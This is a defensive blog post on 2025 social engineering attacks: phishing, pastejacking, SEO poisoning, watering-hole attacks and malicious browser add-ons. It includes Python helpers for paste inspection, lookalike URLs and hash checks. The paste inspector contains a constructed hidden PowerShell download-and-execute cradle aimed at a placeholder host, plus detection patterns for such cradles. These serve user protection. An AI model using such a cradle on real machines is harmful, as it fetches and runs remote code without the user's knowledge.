"What social engineering attacks are in 2025"
Introduction
Social engineering covers a lot of ground, so I’d suggest checking out the stealer log report for a deeper dive into file-based attacks. In the cases reviewed here, most attacks depended on deceiving users into revealing credentials or enabling access rather than exploiting technical vulnerabilities alone.
1. Phishing
Phishing is a fileless attack in which the attacker creates fake pages that look like well-known sites to steal sensitive information such as usernames, passwords, or bank/PayPal account details. The common delivery methods for these fake web apps are SMS, email, QR codes, fake ads on search engines, social media DMs, and messaging apps.
There are 4 main types of web app phishing:
Spear phishing: Targeted attacks on specific individuals or organizations, often using personalized information from OSINT, social media, or leaks to build trust. Because the messages are highly personalized and build trust, these attacks have a higher chance of success.
Bulk phishing: Attackers send out fake websites or messages to large groups of users without any specific targeting. These attacks typically have a much higher failure rate, often due to obvious mistakes, for example sending a “PayPal urgent action” email to someone who doesn’t even use PayPal, or failing to include the recipient’s name and using a generic “Dear user” instead.
Voice/phone call: A rising variant of vishing uses AI to clone or mimic a trusted person’s voice on live phone calls. Attackers leverage these deepfake voices to build immediate credibility and pressure victims into actions like approving transfers, disclosing OTPs, or handing over account details. Because the voice sounds familiar or authoritative, victims are more likely to comply.
Compromised account phishing (double phishing): In this type of attack, the attacker first compromises a trusted user’s or organization’s account, then uses it to target that account’s followers or clients. For example, in a recently reported case BNB Chain’s official X account was phished, and the attackers posted 10 malicious links that tricked followers into connecting wallets or approving transactions. This method exploits both the authority of the original account and the trust of its audience, increasing the likelihood of success.
2. Self XSS / Pastejacking Attacks
Pastejacking is a social engineering attack where a malicious website silently replaces clipboard content with harmful commands (PowerShell scripts, wallet-draining code) when a user copies text. Victims are then instructed to paste and execute the content in a terminal or browser console, unwittingly installing malware or transferring funds.
PowerShell commands: PowerShell is a built-in automation tool, and new reports indicate that attackers are using social engineering on visitors of malicious or compromised websites to trick them into copying and pasting code into their command line that downloads and executes malware on their systems. Another tactic involves a JavaScript copy button that replaces the visible text, so what appears as “this is safe command” becomes something entirely different when pasted, such as “this is harmful command.”
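As an added example (not from the original post), a small Python inspector that a help desk or a cautious user can run on a command before pasting it: it flags the download-cradle and hidden-window switches described above and decodes a base64 -EncodedCommand payload so that encoding cannot hide the cradle. The sample payload, its example.invalid URL and the pattern list are constructed for this example.

```python
import base64
import re

# Red-flag patterns for a "paste this fix into PowerShell" lure. Constructed for
# this example; the dictionary keys are the labels returned to the caller.
CRADLE_PATTERNS = {
    "invoke-expression": r"\b(?:iex|invoke-expression)\b",
    "web-download": r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest)\b|downloadstring|downloadfile",
    "pipe-to-shell": r"\b(?:curl|wget)\b[^|\n]*\|\s*(?:sh|bash|pwsh|powershell)\b",
    "hidden-window": r"-w(?:indowstyle)?\s+hidden",
    "no-profile": r"-nop(?:rofile)?\b",
    "policy-bypass": r"-e(?:p|xecutionpolicy)\s+bypass",
}
# -EncodedCommand (and its short forms) carries base64 of UTF-16LE text.
ENCODED_FLAG = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def decode_encoded_command(cmd: str):
    """Return the plaintext behind a -EncodedCommand argument, or None if there is none."""
    m = ENCODED_FLAG.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def inspect_paste(cmd: str) -> list:
    """List the red flags in a command a user is about to paste. The decoded
    -EncodedCommand payload is scanned too, so encoding cannot hide a download cradle."""
    flags = set()
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        flags.add("encoded-command")
    for text in (cmd, decoded or ""):
        for label, pattern in CRADLE_PATTERNS.items():
            if re.search(pattern, text, re.IGNORECASE):
                flags.add(label)
    return sorted(flags)


# Constructed samples: a typical clipboard payload (the URL is a reserved
# placeholder) and the harmless Get-FileHash command quoted later on this page.
_INNER = "iex (irm http://example.invalid/fix.ps1)"
SAMPLE_PASTE = ("powershell -w hidden -nop -ep bypass -enc "
                + base64.b64encode(_INNER.encode("utf-16-le")).decode())
BENIGN_PASTE = "Get-FileHash 'C:\\Path\\to\\your\\file.exe' -Algorithm SHA256"
```

Running inspect_paste on SAMPLE_PASTE returns the encoded-command, hidden-window, no-profile and policy-bypass labels plus the cradle labels found inside the decoded payload; BENIGN_PASTE returns an empty list.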
Self XSS in 2025: browser console attacks, triggered when users press F12 and paste malicious code into the browser console, represent a highly effective social engineering vector. Attackers, often posing as technical support or site administrators, convince victims to execute JavaScript directly in the context of a legitimate webpage.
This grants full access to the page’s DOM, form inputs, localStorage, session tokens (if not secured), and connected APIs, enabling immediate theft of credentials, session hijacking, or unauthorized actions. These attacks frequently bypass traditional phishing detection by exploiting user trust in real websites and urgent prompts like “fix login error” or “verify wallet connection.” The only reliable defense is a strict policy: never paste any code into the browser console, regardless of the source or stated purpose.
3. SEO poisoning
SEO poisoning is a cyberattack where criminals use black-hat SEO or paid ads to push malicious websites into the top 10 search results. Attackers create fake websites that closely mimic legitimate software sites (like notepad-plus-plus-download.com instead of the official notepad-plus-plus.org), using similar domain names, logos, and layouts.
By ranking these counterfeit sites above the authentic ones, they trick users searching for trusted software (e.g., Notepad++, PuTTY, DeepSeek) into downloading malware disguised as the official installer. Recent 2025 campaigns have targeted over 8,500 systems, with attackers now impersonating AI tools and using advanced techniques like compromising legitimate servers to inherit their search rankings.
In other cases, malicious PDF/document files are hosted on malicious sites to trick users searching for documents into downloading them and infecting their systems.
To prevent infection from SEO poisoning:
- Security protocol
- If you don’t know the official company URL, try looking for its GitHub repository or its Wikipedia page; most companies list their official URL there.
- If you must use a search engine, type only the name of the software, for example ‘notepad++’, and avoid adding keywords like installer, download, or 2025. Once you have searched for that single keyword and reached the official site, navigate to its download section.
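An added Python check (not part of the original post) that applies the protocol above to URLs taken from a results page: only the verified official registrable domain or a true subdomain of it passes, and anything else that merely contains the brand name is flagged as a lookalike. The allowlist holds only the notepad-plus-plus.org example from this page, and the result URLs are constructed.

```python
from urllib.parse import urlsplit

# Registrable domains verified out of band (GitHub repo, Wikipedia page), as the
# protocol above recommends. Constructed allowlist using the page's own example.
OFFICIAL_DOMAINS = {"notepad-plus-plus.org"}


def classify_url(url: str, official=OFFICIAL_DOMAINS) -> str:
    """Classify a search-result URL as 'official', 'lookalike' or 'unrelated'.

    Only the exact official domain or a subdomain of it counts as official;
    any other host that contains the brand name is treated as a lookalike.
    """
    if "://" not in url:
        url = "https://" + url          # bare hosts copied from a results page
    parts = urlsplit(url)
    if "@" in parts.netloc:
        return "lookalike"              # user@host trick: the brand sits before the '@'
    host = (parts.hostname or "").lower().rstrip(".")
    for domain in official:
        if host == domain or host.endswith("." + domain):
            return "official"
    bare_host = host.replace("-", "")
    for domain in official:
        brand = domain.split(".")[0].replace("-", "")
        if brand in bare_host:
            return "lookalike"
    return "unrelated"


# Constructed results list: the official site, a subdomain of it, the lookalike
# named on this page, a brand-as-subdomain trick, and an unrelated site.
SAMPLE_RESULTS = [
    "https://notepad-plus-plus.org/downloads/",
    "https://www.notepad-plus-plus.org/",
    "https://notepad-plus-plus-download.com/",
    "https://notepad-plus-plus.org.example.net/download",
    "https://example.com/notepad-plus-plus",
]


if __name__ == "__main__":
    for u in SAMPLE_RESULTS:
        print(f"{classify_url(u):10} {u}")
```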
4. Watering hole attacks
In a watering hole attack, an official website is compromised by attackers and its official installation file is replaced with a backdoored one that infects the users who download it.
To defend yourself, you can visit the official GitHub repository of the program you want to download; these repositories are harder for attackers to compromise than regular websites, and they also publish a SHA-256 hash of each release. The safest option is to download directly from GitHub. If you choose to download from the official website, you have the GitHub SHA-256 hash to verify the file against, which you can do with this PowerShell command:
Get-FileHash 'C:\Path\to\your\file.exe' -Algorithm SHA256
The result is a long string such as: 745FD1720A71A62F47B2259AD8DC5393DEF2C881A668967C7A54FF0C5DB2C67F. Compare the SHA-256 hash in your PowerShell console to the one on GitHub. If they match, the file on the official website hasn’t been tampered with. As a bonus for your security, this also tells you whether the file you downloaded was tampered with in transit, whether by MITM attacks from ISPs or network operators or by transit corruption.
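The same verification as an added, cross-platform Python example (not from the original post) that goes one step beyond the single Get-FileHash comparison: it checks every entry of a SHA256SUMS-style listing, normalizes hash case before comparing, and reports tampered or missing files. The file names are constructed, and the published hash is the standard test vector for the bytes b"abc" rather than a real release hash.

```python
import hashlib
import hmac
import tempfile
from pathlib import Path

# Well-known SHA-256 test vector for the bytes b"abc", standing in for the hash
# you would copy from a project's GitHub release page (constructed scenario).
PUBLISHED_SHA256_ABC = "BA7816BF8F01CFEA414140DE5DAE2223B00361A396177A9CB410FF61F20015AD"


def sha256_of_file(path: Path) -> str:
    """Hash in 1 MiB chunks so a large installer never has to fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_file(path: Path, published: str) -> bool:
    """Case-insensitive match (Get-FileHash prints upper-case, release pages are
    often lower-case) using a constant-time comparison."""
    return hmac.compare_digest(sha256_of_file(path).lower(), published.strip().lower())


def verify_sums_file(sums_text: str, directory: Path) -> dict:
    """Check each '<hex>  <filename>' line of a SHA256SUMS-style listing.
    Result per file: 'ok', 'MISMATCH' (tampered or corrupted) or 'missing'."""
    results = {}
    for line in sums_text.splitlines():
        parts = line.split()
        if len(parts) != 2:
            continue                            # skip blank lines and comments
        digest, name = parts
        target = directory / name.lstrip("*")   # '*' marks binary mode in some listings
        if not target.is_file():
            results[name] = "missing"
        else:
            results[name] = "ok" if verify_file(target, digest) else "MISMATCH"
    return results


def demo() -> dict:
    """Constructed scenario: an intact download, one altered by a single byte,
    and one listed file that was never downloaded."""
    with tempfile.TemporaryDirectory() as tmp:
        d = Path(tmp)
        (d / "installer.exe").write_bytes(b"abc")
        (d / "portable.zip").write_bytes(b"abd")
        sums = "\n".join(f"{PUBLISHED_SHA256_ABC.lower()}  {n}"
                         for n in ("installer.exe", "portable.zip", "readme.txt"))
        return verify_sums_file(sums, d)
```

demo() returns 'ok' for installer.exe, 'MISMATCH' for portable.zip and 'missing' for readme.txt.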
In cases where there is no GitHub repo for the application, you can check the file signature: right-click -> Properties -> Digital Signatures tab -> click the name of the signer -> Details -> Advanced tab -> click the issuer. If something doesn’t look legitimate about the signature issuer, you should be cautious.
Also, after clicking ‘Details’ you can see a document icon with an information message such as “This digital signature is OK”, or a warning such as “One of the countersignatures is not valid. The file may have been altered.”
Notice that some software doesn’t have any signature at all because of the price tag of signing it; again, common sense will save you from being infected.
5. Browser permissions
Never allow Notifications, Camera, Microphone, Clipboard Read/Write, Geolocation or WebUSB on any site you don’t 100% trust. Be very cautious with WebUSB in particular, as it can give a site access to any plugged-in USB device and could cause critical issues.
6. Browser addons
In August 2025, Mozilla Firefox removed 150+ crypto-draining add-ons impersonating wallets like MetaMask and TronLink, which stole seed phrases and IP addresses after benign uploads turned malicious via updates.
In July 2025, 18 extensions (affecting 2.3 million users) were pulled by Google for tracking browsing behavior and stealing credentials via updates.
- Security protocol
- Only install extensions from the official Chrome Web Store or Mozilla Add-ons site, and even then check reviews + permission warnings.
- Run a reputable ad-blocker (uBlock Origin) and an antivirus/anti-malware scanner; most malicious extensions get caught this way.
Verdict
The machine doesn’t betray you, your moment of “sure, why not” does...
Signed, 12 Dec 25
Nathan